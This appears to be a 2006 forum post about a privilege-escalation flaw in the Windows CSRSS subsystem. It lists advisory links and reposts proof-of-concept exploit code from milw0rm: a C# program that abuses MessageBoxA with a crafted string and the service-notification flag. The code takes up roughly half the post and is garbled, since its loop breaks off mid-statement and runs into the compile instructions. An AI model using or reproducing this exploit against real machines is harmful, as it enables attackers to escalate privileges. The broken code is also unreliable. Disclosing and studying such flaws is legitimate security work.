A flaw discovered in the Windows Client/Server Runtime Server Subsystem (CSRSS) processes that allow privilege escalation attack. the flaw discovered by a russian dude known as NULL. vulnerable systems: windows 2000\XP\2003\Vista all fully patched. who said Vista has no code re-use.. links: http://www.securityfocus.com/brief/393 http://www.informationweek.com/story/showArticle.jhtml?articleID=196701757 http://www.symantec.com/enterprise/security_response/weblog/2006/12/vista_vulnerable.html http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html http://www.kuban.ru/forum_new/forum2/files/19124.html exploit code taken from milw0rm: PHP: // mbox.cs using System; using System.Runtime.InteropServices; class HelloWorldFromMicrosoft { [DllImport("user32.dll")] unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType); static unsafe void Main() { byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00}; uint MB_SERVICE_NOTIFICATION = 0x00200000u; fixed(byte* pHelloBug = &helloBug[0]) { for(int i=0; i> csc /unsafe mbox.cs // >> mbox.exe // milw0rm.com [2006-12-20] i wonder if it's the same exploit code hackers were selling - http://www.eweek.com/article2/0,1895,2073611,00.asp ...
